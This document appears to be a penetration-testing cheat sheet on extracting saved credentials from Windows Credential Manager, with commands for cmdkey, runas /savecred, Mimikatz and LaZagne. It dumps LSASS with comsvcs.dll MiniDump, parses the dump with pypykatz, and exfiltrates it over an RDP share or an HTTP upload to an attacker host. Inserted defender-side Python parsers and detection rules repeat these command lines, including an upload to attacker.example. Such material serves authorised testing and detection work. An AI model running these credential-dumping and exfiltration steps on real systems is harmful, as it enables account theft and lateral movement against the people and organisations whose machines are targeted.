Methodology Checklist
- List stored credentials: cmdkey /list
- Use saved credential with runas: runas /savecred /user:[DOMAIN]\[USER] cmd.exe
- Extract with Mimikatz: sekurlsa::credman
- Extract with LaZagne: lazagne.exe credman
- Check for saved RDP, VPN, or web credentials
- Look for service account credentials stored for scheduled tasks
- Document all extracted credentials for report
Operational Context
Use when: Windows foothold with user-level access; extract saved credentials from Windows Credential Manager (web credentials, network passwords, certificate-based).
Think Dumber First: cmdkey /list shows what's stored. Then nxc smb [TARGET] -u [USER] -p [PASS] --wcc for remote enumeration. Mimikatz vault::cred or vault::list for local extraction.
Skip when: Credential Manager is empty (cmdkey /list returns nothing); common on servers, more useful on workstations.
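For the blue-team side of the same step, the following is an added example (not part of the original cheat sheet) that parses the text cmdkey /list prints into structured entries, counts them by type, and flags the Domain Password entries for TERMSRV/* targets, i.e. the saved RDP logons the page singles out as the highest-value items. The sample output and all host and user names are constructed placeholders; the "svc" prefix used to flag service-account-looking users is an assumed naming convention, not a Windows rule.

```python
"""Inventory parser for `cmdkey /list` output (defender-side audit).

Added example, not the cheat sheet's own code. The sample below is a
constructed imitation of cmdkey's Target / Type / User block format.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample of `cmdkey /list` output (not captured from a real host).
SAMPLE_CMDKEY_OUTPUT = """
Currently stored credentials:

    Target: Domain:target=TERMSRV/fileserver01
    Type: Domain Password
    User: CORP\\itadmin

    Target: Domain:target=TERMSRV/sqlserver02
    Type: Domain Password
    User: CORP\\svc_backup
    Local machine persistence

    Target: LegacyGeneric:target=git:https://git.example.local
    Type: Generic
    User: jdoe

    Target: MicrosoftAccount:target=SSO_POP_Device
    Type: Generic
    User: 02abcdef...
"""

# Assumed naming convention for service accounts (placeholder heuristic).
SERVICE_ACCOUNT_PREFIX = "svc"

ENTRY_FIELD = re.compile(r"^(Target|Type|User):\s*(.*)$")


@dataclass
class StoredCredential:
    target: str     # raw target string, e.g. "Domain:target=TERMSRV/host"
    cred_type: str  # "Domain Password", "Generic", ...
    user: str

    @property
    def target_name(self) -> str:
        """Strip the 'Domain:target=' / 'LegacyGeneric:target=' prefix."""
        return self.target.split("=", 1)[1] if "=" in self.target else self.target

    @property
    def is_rdp(self) -> bool:
        """TERMSRV/* targets are saved Remote Desktop logons."""
        return "TERMSRV/" in self.target.upper()

    @property
    def looks_like_service_account(self) -> bool:
        account = self.user.split("\\")[-1].lower()
        return account.startswith(SERVICE_ACCOUNT_PREFIX)


def parse_cmdkey_list(text: str) -> List[StoredCredential]:
    """Split cmdkey output into entries; blank lines separate the blocks."""
    entries: List[StoredCredential] = []
    current: Dict[str, str] = {}

    def flush() -> None:
        if "Target" in current:
            entries.append(StoredCredential(
                current["Target"], current.get("Type", ""), current.get("User", "")))
        current.clear()

    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            flush()
            continue
        match = ENTRY_FIELD.match(line)
        if match:  # lines such as "Local machine persistence" are ignored
            current[match.group(1)] = match.group(2).strip()
    flush()
    return entries


def summarize(entries: List[StoredCredential]) -> Dict[str, object]:
    """Count entries per type and list the saved RDP logons and service accounts."""
    by_type: Dict[str, int] = {}
    for entry in entries:
        by_type[entry.cred_type] = by_type.get(entry.cred_type, 0) + 1
    rdp: List[Tuple[str, str]] = [
        (e.target_name, e.user) for e in entries
        if e.cred_type == "Domain Password" and e.is_rdp]
    service_accounts = [e.user for e in entries if e.looks_like_service_account]
    return {"by_type": by_type, "rdp_targets": rdp, "service_accounts": service_accounts}


if __name__ == "__main__":
    found = parse_cmdkey_list(SAMPLE_CMDKEY_OUTPUT)
    for key, value in summarize(found).items():
        print(f"{key}: {value}")
```

Run it against real output by piping cmdkey /list into a file and reading that file instead of SAMPLE_CMDKEY_OUTPUT; a fleet-wide run of the same parser gives the workstation inventory the page's "Skip when" rule relies on.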
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| cmdkey /list | List all stored credentials in Credential Manager |
| rundll32 keymgr.dll,KRShowKeyMgr | Open Credential Manager GUI (requires RDP) |
| runas /savecred /user:[DOMAIN]\[USER] cmd | Spawn shell as stored user (no plaintext needed) |
| mimikatz.exe → privilege::debug → sekurlsa::credman | Dump Credential Manager from live LSASS memory |
| tasklist /svc | Find lsass.exe PID for MiniDump |
| rundll32 C:\windows\system32\comsvcs.dll, MiniDump [PID] C:\lsass.dmp full | Dump LSASS to file |
| pypykatz lsa minidump lsass.dmp > creds.txt | Parse dump offline |
| grep -i -C 5 "credman" creds.txt | Filter pypykatz output for Credential Manager entries |
| python3 -m uploadserver 8000 | Start HTTP upload server (attacker) to receive dump |
| Invoke-RestMethod -Uri http://[LHOST]:8000/upload -Method Post -InFile C:\lsass.dmp | Upload dump via PowerShell |
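Every row in the cheatsheet, and the LSASS dump and upload steps of Exploitation Path 3 below, leaves a process-creation event behind. The following added example (not part of the original cheat sheet) runs a small rule set modelled on those command lines over Sysmon Event ID 1 / Security 4688 style records and triages the hits per user, so a SOC can see the sequence cmdkey → runas /savecred → comsvcs MiniDump → upload as one story. The events, hostnames, users and the attacker.example host are constructed placeholders; the field names follow Sysmon's Image / CommandLine / User.

```python
"""Command-line detection rules for Credential Manager harvesting.

Added example, not the cheat sheet's own code. Rules are case-insensitive
regexes over the image path and command line of constructed events.
"""
import re
from typing import Dict, List, Tuple

# Constructed process-creation events (not from a real host).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "1", "Image": r"C:\Windows\System32\cmdkey.exe",
     "CommandLine": "cmdkey /list", "User": r"CORP\jdoe"},
    {"id": "2", "Image": r"C:\Windows\System32\runas.exe",
     "CommandLine": r"runas /savecred /user:CORP\itadmin cmd.exe", "User": r"CORP\jdoe"},
    {"id": "3", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 712 C:\lsass.dmp full",
     "User": r"CORP\jdoe"},
    {"id": "4", "Image": r"C:\Windows\System32\rundll32.exe",  # benign rundll32 use
     "CommandLine": r"rundll32 C:\Windows\System32\shell32.dll,Control_RunDLL", "User": r"CORP\jdoe"},
    {"id": "5", "Image": r"C:\Users\jdoe\Downloads\m.exe",  # renamed mimikatz binary
     "CommandLine": r'm.exe "privilege::debug" "sekurlsa::credman" exit', "User": r"CORP\jdoe"},
    {"id": "6", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Invoke-RestMethod -Uri http://attacker.example:8000/upload "
                    r"-Method Post -InFile C:\lsass.dmp", "User": r"CORP\jdoe"},
]

# (rule name, severity, image regex, command-line regex), all matched lowercase.
Rule = Tuple[str, str, str, str]
RULES: List[Rule] = [
    ("lsass_minidump_comsvcs", "high", r"rundll32\.exe$", r"comsvcs\.dll.*minidump"),
    ("mimikatz_credman_module", "high", r".",
     r"sekurlsa::credman|vault::cred|vault::list|privilege::debug"),
    ("lsass_dump_upload", "high", r"powershell\.exe$", r"invoke-restmethod.*-infile.*\.dmp"),
    ("runas_savecred", "medium", r"runas\.exe$", r"/savecred"),
    ("credman_enumeration", "low", r"cmdkey\.exe$", r"/list"),
    ("credman_gui", "low", r"rundll32\.exe$", r"keymgr\.dll,\s*krshowkeymgr"),
]
SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2}


def evaluate(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one hit per (event, rule) pair whose image and command line both match."""
    hits: List[Dict[str, str]] = []
    for event in events:
        image = event.get("Image", "").lower()
        cmdline = event.get("CommandLine", "").lower()
        for name, severity, image_re, cmd_re in RULES:
            if re.search(image_re, image) and re.search(cmd_re, cmdline):
                hits.append({"event": event["id"], "rule": name,
                             "severity": severity, "user": event.get("User", "")})
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[str, Dict[str, object]]:
    """Group hits per user: highest severity seen and the sorted set of rule names.

    A low-severity cmdkey /list on its own is routine admin activity; the same
    user also tripping a high-severity rule is what makes it worth a ticket.
    """
    per_user: Dict[str, Dict[str, object]] = {}
    for hit in evaluate(events):
        entry = per_user.setdefault(hit["user"], {"max_severity": "low", "rules": set()})
        if SEVERITY_RANK[hit["severity"]] > SEVERITY_RANK[str(entry["max_severity"])]:
            entry["max_severity"] = hit["severity"]
        entry["rules"].add(hit["rule"])  # type: ignore[union-attr]
    for entry in per_user.values():
        entry["rules"] = sorted(entry["rules"])  # type: ignore[arg-type]
    return per_user


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
    print(triage(SAMPLE_EVENTS))
```

The image regex for the mimikatz rule is deliberately "." because the binary is routinely renamed (event 5); the module names in the command line are the stable indicator. Conversely the comsvcs rule anchors on rundll32.exe so that an unrelated rundll32 call (event 4) produces no hit.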
Deep Dive & Workflow
What Credential Manager Stores
Windows Credential Manager holds credentials for:
- Domain Password: saved AD logon credentials for remote systems
- Generic: browser-saved credentials, mapped drives, application passwords
- Certificate-based: smart card / certificate credentials
Storage paths (encrypted with DPAPI):
%UserProfile%\AppData\Local\Microsoft\Vault\
%UserProfile%\AppData\Local\Microsoft\Credentials\
%UserProfile%\AppData\Roaming\Microsoft\Vault\
%ProgramData%\Microsoft\Vault\
Exploitation Path 1: RunAs Impersonation (No Creds Needed)
If cmdkey /list shows a Domain Password entry for a target user, that credential can be used directly to spawn a shell; no plaintext password is required:
runas /savecred /user:DOMAIN\Username cmd.exe
High-value target: IT admins often store RDP credentials for servers they manage.
Exploitation Path 2: Live Dump via Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::credman
Look for credman sections with Username, Domain, and Password fields in the output. Requires local admin.
Exploitation Path 3: Offline via LSASS Dump + Pypykatz
Preferable when AV is active, since processing happens off-target:
# Exfil option A: RDP drive share
xfreerdp /v:[TARGET_IP] /u:[USER] /p:[PASS] /drive:share,$(pwd)
# On target: copy C:\lsass.dmp \\tsclient\share\
# Exfil option B: HTTP upload
python3 -m uploadserver 8000
# On target: Invoke-RestMethod -Uri http://[LHOST]:8000/upload -Method Post -InFile C:\lsass.dmp
# Parse
pypykatz lsa minidump lsass.dmp > creds.txt
grep -i -C 5 "credman" creds.txt
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| cmdkey shows credentials but can't extract | Requires session of that user | Use runas or token impersonation to get user context first |
| Mimikatz vault::cred returns nothing | Protected by DPAPI with different user key | Must run as the target user; DPAPI is user-specific |
| Generic credentials not displaying | Type filter needed | Enumerate all types: mimikatz # vault::list /patch |
| vaultcmd.exe not found | Older Windows | Use direct registry: reg query HKCU\Software\Microsoft\Protected Storage System Provider |
| Web credentials encrypted | Browser-specific DPAPI | Use LaZagne: lazagne.exe browsers extracts browser-stored creds separately from Windows Vault |
Reporting Trigger
Finding Title: Windows Credential Manager Yields Plaintext Service Credentials
Impact: Credentials saved in Windows Credential Manager for RDP connections, mapped network drives, and web applications are extractable in plaintext from user context, providing access to additional systems without brute force.
Root Cause: Users save credentials in Windows Credential Manager for convenience without understanding that they are extractable by the user's own session or any code running in that session context.
Recommendation: Disable Windows Credential Manager for sensitive credentials via GPO. Enforce use of an enterprise password manager for credential storage. Implement Privileged Access Workstations that prevent credential caching. Train users on the risks of saved credentials.